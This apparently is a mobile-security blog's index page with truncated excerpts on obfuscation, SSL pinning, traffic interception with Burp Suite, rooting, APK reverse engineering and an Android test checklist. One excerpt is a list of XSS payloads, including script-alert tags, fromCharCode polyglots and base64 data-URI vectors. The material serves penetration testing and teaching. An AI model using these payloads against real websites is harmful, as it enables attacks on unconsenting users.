Just A N00B Thinking

When it comes to security of an application, Source code piracy is one of the major concerns. If your source code is available to hackers, it means you are totally screwed. Hackers can then easily bypass your applied security controls, re-build application with malicious code snippets and also misuse the business logic used in the application. Obfuscation is the process of renaming the meta-data in an Assembly so that it is no longer useful to a hacker, but remains usable to the machine for executing the intended operations. It does not modify the actual instructions or mask them from observation by a hacker. Reverse engineering of your proprietary applications by unfair competition or malicious hackers may result in highly undesirable exposure of your algorithms and ideas, proprietary data formats, licensing and security mechanisms, and, most importantly, your customers' data. Getting into more details about Code Obfuscation as given below. Name Obfuscation: Na...

What is SSL pinning? Why do we need SSL pinning in mobile applications? How to do it? SSL pinning means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device.  SSL Pinning on Android: Simplest Way PROS of Certificate Pinning: Increased security  - with pinned SSL certificates, the app is independent of the device’s trust store. Compromising the hard coded trust store in the app is not so easy - the app would need to be decompiled, changed and then recompiled again - and it can’t be signed using the same Android keystore that the original developer of the app used. Reduced costs  - SSL certificate pinning gives you ...

Most affecting and Active Malwares on Mobile Devices: DangerousObject.Multi.Generic Trojan-SMS.AndroidOS.OpFake.bo AdWare.AndroidOS.Ganlet.a Trojan-SMS.AndroidOS.FakeInst.a RiskTool.AndroidOS.SMSreg.cw Trojan-SMS.AndroidOS.Agent.u Trojan-SMS.AndroidOS.OpFake.a Trojan.AndroidOS.Plangton.a Trojan.AndroidOS.MTK.a AdWare.AndroidOS.Hamob.a Android.Geinimi SMS.AndroidOS.FakePlayer.c Android.DroidDream AKA Android.Rootcager AKA AndroidOS_Lootoor.A Android.BgServ AKA Troj/Bgserv-A AKA AndroidOS_BGSERV.A Android.KungFu Variants More are here: AegisLab, Andr/Plankton-A, Andr/SMSRep-B/C, Android, Android Market, Android OS, Android.Adrd, Android.Adrd.A, Android.Adsms, Android.Basebridge, Android.Bgserv, Android.DroidDream, Android.Fokonge, Android.Geinimi, Android.GGTracker, Android.Gunfu, Android.Hippo, Android.HippoSMS, Android.HongTouTou, Android.Jsmshider, Android.LightDD, Android.Lovetrap, Android.NickiBot, Android.Nickispy, Android.Pja...

To intercept mobile application traffic you need to perform MITM attacks. This can be easily done using proxies like Burp Suite, Fiddler, Charles, Paros, etc. I prefer to use burp suite as it is most flexible to use for penetration testing. The below given steps will help you to setup required interception environment:    Install the target application.apk on the mobile device, let’s consider Android device in this case. Now goto Menu à Setting à Wi-Fi Connect to your common Wifi being used by your Mobile device and Laptop. Find the IP address of your laptop using “ifconfig/ipconfig” command. Now in your mobile Wi-Fi, touch-n-hold the connected Wi-Fi and select “Modify Network Check the option “Show advanced options” and under proxy settings select “Manual”. Now enter ·           Proxyhostname: <your laptop IP>                ...

Java code compiled for the BlackBerry goes through the following steps using the tools mentioned:   Code is compiled using the javac.exe compiler, and an application JAR file is generated. At this point, all Java methods, constructs, and classes are fair game. The preverify.exe tool is run against the generated JAR files and looks for code constructs that are not allowed in JME applications (for example, calls to Java native invocation or invalid Java instructions). The pre-verifier is used in both BlackBerry and JME development. Once the pre-verifier step completes, the Classes are marked as verified. RIM’s compiler, rapc.exe, converts the verified JAR file to a BlackBerry executable COD file. Rapc is an optimizing compiler that removes symbolic information and adds RIM proprietary instructions to the binary in order to reduce size and improve performance. If the application is going to be deployed to a real device or to a simulator with security enabled, the COD file i...

This part focuses on Jailbreaking IOS device, Rooting Android devices and Developer unlocking Windows phones. Rooting Android Device: Rooting your device means to allow application to run with Super User permissions. There are many ways to root your android device. Below are steps to root your android device: Connect your device to computer using data-cable and ensure that Homescreen is unlocked. Download and install the  Kingo Root tool  on your computer. After installation, open the Kingo Root and it will detect you device (and install driers for it if they are missing J ). Click on “Root” to begin patching of binaries. It will take few minutes to root your device. Once successful, then you can install “SuperUser” app on your android device which will allow you to easily grant Root Permission to other application. Note:  If you are trying rooting your NEXUS device, then download  Nexus RootToolkit (NRT) instead of Kingo Tool and enjoy your rooted...

There are many simple ways to do reverse engineering (first step towards Mobile application security). As of today, there are various mobile platforms available. We will keep our primary focus on Android, IOS, Windows and Blackberry. Reverse engineering Android Mobile App (APK File): 1.     Select the APK file you want to reverse engineer. Using any extractor like 7zip, extract the files. 2.       Now you can see a file named classes.dex. 3.       Using the tool   dex2jar  to convert classes.dex into a readable jar. Command : dex2jar.bat classes.dex 4.   Now using any Java decompiler, you can open the newly converted file "classes_dex2jar". In my case i am using   jdgui , a free tool. 5.       Now you can see all the packages and class files inside it. 6.       Look for hard-coded sensitive information in the code (if code is ...

Here we go: use any of it (depending on situation) <script>alert(123)</script> <script>alert("hellox worldss");</script> javascript:alert("hellox worldss") <img src="javascript:alert('XSS');"> <img src=javascript:alert(&quot;XSS&quot;)> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOn...

Android Client-Side Attacks and Tests CATEGORY TEST NAME Information Gathering Reverse Engineering the Application Code Testing for Common Libraries and Fingerprinting Enumeration of Application Known Controllers Information Disclosure by Logcat Application Local Storage Flaws Hidden Secrets in the Code Storing Sensitive Data on Shared Storage (exposed to all applications without any restrictions) Cryptographic Based Storage Strength Content Providers Access Permissions Content Providers SQL Injection Privacy and Metadata Leaks IPC Security User Propriety Data in Logcat Technical Valuable Data in Logcat Exposed Components and Cross Application Authorization Permissions & Digital Signature Data Sharing Issues Clipboard Separation Public Intents and Unauthenticated Data Sources Privacy Breaches Public Intents and Authorization Flaws Code Puzzling and Abusing Application State Race Conditions, Deadlocks and Concurrency Threats In Device Denial of Servi...